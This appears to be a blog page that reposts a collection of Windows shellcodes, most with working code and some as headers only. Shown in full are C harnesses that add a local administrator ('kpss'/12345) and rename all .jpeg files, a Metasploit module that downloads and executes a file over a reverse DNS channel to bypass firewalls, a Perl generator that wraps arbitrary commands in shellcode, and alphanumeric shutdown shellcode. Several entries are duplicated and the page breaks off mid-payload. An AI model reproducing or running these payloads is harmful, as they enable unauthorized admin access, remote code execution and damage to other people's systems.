===================================================== win32 generic - add new local administrator 326 bytes ===================================================== /* Title: generic win32 - add new local administrator 326 bytes Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com Method: Dynamic opcode, encoded shellcode Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.100427-1636 and Build 2600.080413-2111 Greetz: offsec team, inj3ct0r team, hdm */
My LogiX is Undeniable.
Showing posts with label ShellCode. Show all posts
Showing posts with label ShellCode. Show all posts
win32 generic - add new local administrator 326 bytes
win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
==================================================================== win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes ==================================================================== /* Title: win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com Method: Hardcoded opcodes (kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa) Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.080413-2111 Greetz: offsec and inj3ct0r teams */
win32/xp pro sp3 MessageBox shellcode
/*
Title: win32/xp pro sp3 MessageBox shellcode 11 bytes
Author: d3c0der - d3c0der[at]hotmail[dot]com
Tested on: WinXP Pro SP3 (EN) # ( run MessageBox that show an error message )
website : Www.AttackerZ.ir
spt : All friends ;)
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\x33\xd2\x52\x52\x52\x52\xe8\xbe\xe9\x44\x7d";
int main(int argc, char **argv)
{
((void (*)())code)();
return 0;
}
Activate Guest Account Shellcode
#(+) Exploit Title: win32/xp sp3 Activate Guest Account Shellcode 67 Bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit
Windows Magnifier Shellcode
#(+) Exploit Title: win32/xp sp3 Windows Magnifier Shellcode 52 bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit
win32/xp sp3 Force Kill explorer.exe process
#(+) Exploit Title: win32/xp sp3 Force Kill explorer.exe process Shellcode 73 Bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit
VB6_vbaExceptHandler - SEH (calc.exe) ShellCode
# =========[ Sh31LC0d3.C ]=====>
/*
###
# Title : Win32 VB6_vbaExceptHandler - SEH (calc.exe) ShellCode - 149 Bytes
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Win32
# Target : VB6 ExE Project >*> Command : Shell ("calc.exe")
# Tested on : Windows XP SP3 France
###
*/
download & execute file via reverse DNS channel
# Shellcode: download and execute file via reverse DNS channel
#
#
# Features:
# * Windows 7 tested
# * UAC without work (svchost.exe makes requests via getaddrinfo)
# * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat do, but without sockets and stable!)
# * NO SOCKET
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
#
#
# By Alexey Sintsov
# [DSecRG]
# a.sintsov [sobachka] dsecrg.com
# dookie [sobachka] inbox.ru
#
# P.S. Works with Vista/7/2008
# do not work in XP/2003 because thre are no IPv6 by default.
# can work in XP/2003 if IPv6 installed
# (it is not need to be enabled, just installed)
require 'msf/core'
module Metasploit3
include Msf::Payload::Windows
include Msf::Payload::Single
def initialize(info = {})
super(update_info(info,
'Name' => 'DNS_DOWNLOAD_EXEC',
'Version' => '0.01',
'Description' => 'Download and Exec (via DNS)',
'Author' => [ 'Alexey Sintsov' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Payload' =>
{
'Offsets' =>{ },
'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74\x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33\x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73\x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
'Payload1' => "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
'Payload2' => "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff\x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10\x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B\xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b\xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33\xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66\x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04\x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8\x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61\xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40\x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05\x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33\xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18"
}
))
# We use rtlExitThread(0)
deregister_options('EXITFUNC')
# Register the domain and cmd options
register_options(
[
OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
], self.class)
end
#
# Constructs the payload
#
def generate_stage
domain = datastore['DOMAIN'] || ''
extens = datastore['FILE'] || 'vbs'
# \"x66\x79\x66\x01"
extLen=extens.length
while extens.length<4
extens=extens+"\x01"
end
i=0
while i<extLen
extens[i,1]=(extens[i].ord+1).chr
i=i+1
end
while domain.length<10
domain=domain+"\xFF"
end
domain="\x2e"+domain
payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']
return payload
end
end
#
#
# Features:
# * Windows 7 tested
# * UAC without work (svchost.exe makes requests via getaddrinfo)
# * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat do, but without sockets and stable!)
# * NO SOCKET
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
#
#
# By Alexey Sintsov
# [DSecRG]
# a.sintsov [sobachka] dsecrg.com
# dookie [sobachka] inbox.ru
#
# P.S. Works with Vista/7/2008
# do not work in XP/2003 because thre are no IPv6 by default.
# can work in XP/2003 if IPv6 installed
# (it is not need to be enabled, just installed)
require 'msf/core'
module Metasploit3
include Msf::Payload::Windows
include Msf::Payload::Single
def initialize(info = {})
super(update_info(info,
'Name' => 'DNS_DOWNLOAD_EXEC',
'Version' => '0.01',
'Description' => 'Download and Exec (via DNS)',
'Author' => [ 'Alexey Sintsov' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Payload' =>
{
'Offsets' =>{ },
'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74\x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33\x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73\x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
'Payload1' => "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
'Payload2' => "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff\x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10\x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B\xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b\xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33\xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66\x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04\x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8\x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61\xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40\x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05\x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33\xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18"
}
))
# We use rtlExitThread(0)
deregister_options('EXITFUNC')
# Register the domain and cmd options
register_options(
[
OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
], self.class)
end
#
# Constructs the payload
#
def generate_stage
domain = datastore['DOMAIN'] || ''
extens = datastore['FILE'] || 'vbs'
# \"x66\x79\x66\x01"
extLen=extens.length
while extens.length<4
extens=extens+"\x01"
end
i=0
while i<extLen
extens[i,1]=(extens[i].ord+1).chr
i=i+1
end
while domain.length<10
domain=domain+"\xFF"
end
domain="\x2e"+domain
payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']
return payload
end
end
Add Admin Shellcode 112 bytes
# Title : win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes
# Author : KaHPeSeSe
# Screenshot : http://i53.tinypic.com/289yamq.jpg
# Desc. : usr: kpss , pass: 12345 , localgroup: Administrator
# Tested on : PERFECT XP PC1 / SP3
# Date : 18/07/2011
# Not : a.q kpss :((
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4e\x53\xbb\x0d\x25\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"
"\x65\x72\x20\x6b\x70\x73\x73\x20\x31\x32\x33\x34\x35\x20\x2f\x61\x64"
"\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
"\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
"\x20\x2f\x61\x64\x64\x20\x6b\x70\x73\x73";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
# Author : KaHPeSeSe
# Screenshot : http://i53.tinypic.com/289yamq.jpg
# Desc. : usr: kpss , pass: 12345 , localgroup: Administrator
# Tested on : PERFECT XP PC1 / SP3
# Date : 18/07/2011
# Not : a.q kpss :((
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4e\x53\xbb\x0d\x25\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"
"\x65\x72\x20\x6b\x70\x73\x73\x20\x31\x32\x33\x34\x35\x20\x2f\x61\x64"
"\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
"\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
"\x20\x2f\x61\x64\x64\x20\x6b\x70\x73\x73";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
Win32 / Windows7 Sp1 - rename .jpeg to .vir
# Exploit Title: Win32 / Windows7 Sp1 - rename .jpeg to .vir (57 bytes)
# Date: July, 23 2011
# Author: Theuzuki.'
# Vendor or Software Link: -
# Version: -
# Category:: shellcodes
# Google dork: -
# Tested on: Windows 7 sp 1
# Demo site: -
==================================================
Made by:
___________.__ ____ ___ __ .__
\__ ___/| |__ ____ | | \__________ __| | _|__|
| | | | \_/ __ \| | /\___ / | \ |/ / |
| | | Y \ ___/| | / / /| | / <| |
|____| |___| /\___ >______/ /_____ \____/|__|_ \__|
\/ \/Rats Crew \/ TheCod3r \/
Mail: Uzuki@live.de
Website: www.thecoder.co.tv
Nicknames: TheUzuki.' / TheCod3r
Greeting: TheRats Crew
==================================================
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\xeb\x16\x5b\x31\xc0\x50"
"\x53\xbb\x39\xe7\x99\x75\xff\xd3\x31\xc0"
"\x50\xbb\x6f\x2a\x96\x75\xff\xd3\xe8\xe5"
"\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x52\x45\x4e\x20\x2a\x2e\x6a\x70\x65"
"\x67\x20\x2a\x2e\x76\x69\x72\x00";
int main(int argc, char **argv)
{
((void (*)())code)();
printf("Renaming all .jpeg files to .vir files");
return 0;
}
# Date: July, 23 2011
# Author: Theuzuki.'
# Vendor or Software Link: -
# Version: -
# Category:: shellcodes
# Google dork: -
# Tested on: Windows 7 sp 1
# Demo site: -
==================================================
Made by:
___________.__ ____ ___ __ .__
\__ ___/| |__ ____ | | \__________ __| | _|__|
| | | | \_/ __ \| | /\___ / | \ |/ / |
| | | Y \ ___/| | / / /| | / <| |
|____| |___| /\___ >______/ /_____ \____/|__|_ \__|
\/ \/Rats Crew \/ TheCod3r \/
Mail: Uzuki@live.de
Website: www.thecoder.co.tv
Nicknames: TheUzuki.' / TheCod3r
Greeting: TheRats Crew
==================================================
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\xeb\x16\x5b\x31\xc0\x50"
"\x53\xbb\x39\xe7\x99\x75\xff\xd3\x31\xc0"
"\x50\xbb\x6f\x2a\x96\x75\xff\xd3\xe8\xe5"
"\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x52\x45\x4e\x20\x2a\x2e\x6a\x70\x65"
"\x67\x20\x2a\x2e\x76\x69\x72\x00";
int main(int argc, char **argv)
{
((void (*)())code)();
printf("Renaming all .jpeg files to .vir files");
return 0;
}
win32/ 7 sp1 MessageBox
# Exploit Title: win32/ 7 sp1 MessageBox
# Date: July, 23 2011
# Author: Theuzuki.'
# Vendor or Software Link: -
# Version: -
# Category:: shellcodes
# Google dork: -
# Tested on: Windows 7 sp 1
# Demo site: -
==================================================
Discovered by:
___________.__ ____ ___ __ .__
\__ ___/| |__ ____ | | \__________ __| | _|__|
| | | | \_/ __ \| | /\___ / | \ |/ / |
| | | Y \ ___/| | / / /| | / <| |
|____| |___| /\___ >______/ /_____ \____/|__|_ \__|
\/ \/ Rats Crew \/ TheCod3r\/
Mail: Uzuki@live.de
Website: www.thecoder.co.tv
Nicknames: TheUzuki.' / TheCod3r
Greeting: TheRats Crew
==================================================
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x2a\x59\xbb\x04\x28\x96\x75\x51\xff\xd3\xeb\x2f\x59\x51\x50\xbb\xd7\x17\x96\x75\xff\xd3\xeb\x34\x59\x31\xd2\x52\x51\x51\x52\xff\xd0\x31\xd2\x50\xb8\x6f\x2a\x96\x75\xff\xd0\xe8\xd1\xff\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00\xe8\xcc\xff\xff\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x00\xe8\xc7\xff\xff\xff\x54\x65\x73\x65\x64\x20\x66\x6f\x72\x20\x48\x61\x63\x6b\x69\x6e\x67\x20\x77\x69\x6e\x37\x20\x2d\x20\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00";
int main(int argc, char **argv)
{
((void (*)())code)();
printf("Printing MsgBox with Tesed for Hacking win7 - MessageBox");
return 0;
}
# Date: July, 23 2011
# Author: Theuzuki.'
# Vendor or Software Link: -
# Version: -
# Category:: shellcodes
# Google dork: -
# Tested on: Windows 7 sp 1
# Demo site: -
==================================================
Discovered by:
___________.__ ____ ___ __ .__
\__ ___/| |__ ____ | | \__________ __| | _|__|
| | | | \_/ __ \| | /\___ / | \ |/ / |
| | | Y \ ___/| | / / /| | / <| |
|____| |___| /\___ >______/ /_____ \____/|__|_ \__|
\/ \/ Rats Crew \/ TheCod3r\/
Mail: Uzuki@live.de
Website: www.thecoder.co.tv
Nicknames: TheUzuki.' / TheCod3r
Greeting: TheRats Crew
==================================================
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x2a\x59\xbb\x04\x28\x96\x75\x51\xff\xd3\xeb\x2f\x59\x51\x50\xbb\xd7\x17\x96\x75\xff\xd3\xeb\x34\x59\x31\xd2\x52\x51\x51\x52\xff\xd0\x31\xd2\x50\xb8\x6f\x2a\x96\x75\xff\xd0\xe8\xd1\xff\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00\xe8\xcc\xff\xff\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x00\xe8\xc7\xff\xff\xff\x54\x65\x73\x65\x64\x20\x66\x6f\x72\x20\x48\x61\x63\x6b\x69\x6e\x67\x20\x77\x69\x6e\x37\x20\x2d\x20\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00";
int main(int argc, char **argv)
{
((void (*)())code)();
printf("Printing MsgBox with Tesed for Hacking win7 - MessageBox");
return 0;
}
Command Execution exploit/shellcode
#!/usr/bin/perl
system("cls");
sub logo(){
print q'
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
1 ______ 0
0 .-" "-. 1
1 / KedAns-Dz \ =-=-=-=-=-=-=-=-=-=-=-| 0
0 Algerian HaCker | | > Site : 1337day.com | 1
1 --------------- |, .-. .-. ,| > Twitter : @kedans | 0
0 | )(_o/ \o_)( | > ked-h@hotmail.com | 1
1 |/ /\ \| =-=-=-=-=-=-=-=-=-=-=| 0
0 (@_ (_ ^^ _) HaCkerS-StreeT-Team 1
1 _ ) \_______\__|IIIIII|__/_______________________ 0
0 (_)@8@8{}<________|-\IIIIII/-|________________________> 1
1 )_/ \ / 0
0 (@ `--------` © 2011, Inj3ct0r Team 1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
0 Windows/32bit - Command Execution Exploit/ShellCode - 44 Bytes + CMD 1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
';
}
logo();
###
# Title : win32/xp sp3 Command Execution exploit/shellcode - 44 Bytes + CMD
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com
# Twitter page : twitter.com/kedans
# platform : win32
# Impact : Command Execution / Shellcode maker
# Tested on : Windows XP sp3 Fr
###
# (~) Greetings To : Caddy-Dz (+) JaGo-Dz (+) Dr.Ride (+) All My Friends
###
$ARGC=@ARGV;
if ($ARGC!=1) {
print "\n [!] Usage: perl $0 [Command] \n\n";
die " [*] f.ex: perl $0 shutdown -s -t 18 \n";
}
my $CMD = shift;
my $header = q'
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
';
my $sh = q'
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x29\x53\xbb\xad\x23\x86\x7c".
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20'.$CMD.'"';
my $end = q'
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
';
print $header.$sh.$end;
Alphanumeric Shutdown 18s
/*
# Title : win32/xp sp3 Alphanumeric Shutdown 18s - Shellcode - 534 Bytes
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Impact : Shutdown at 18 s [~ CMD : shutdown -s -t 18]
# Tested on : Windows XP sp3 Fr
*/
#include <stdio.h>
char shell[]=
"\x89\xE3" // MOV EBX,ESP
"\xDB\xC2" // FCMOVNB ST,ST(2)
"\xD9\x73\xF4" // FSTENV (28-BYTE) PTR DS:[EBX-C]
"\x5E" // POP ESI
// Start Alphanumeric Payload
"VYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOKEoDFPNEsFQIYLqEeKjKcIICDDdIdQJNcKrGtFQQJDKGsQJF"
"THdMkIONBPaG3GPGBB2HMKuDCC0OYNnEaMDH9O3LyQOHoJWCzDmP8KGIkLXGnGFIlDlMOOdEnFNQsHgEBJ0PZFHQwKaMKF5OwLCD4D"
"QP5DtJPE7OuP5JvJCMeBmCcDsQQKTQJBDKIBSEDOlQbIKK5MMBwEoJYN4KlHtMYJFDtKuBRKiBXOzBlJuBUIBLIKbPeMqKQEpFxNRP1"
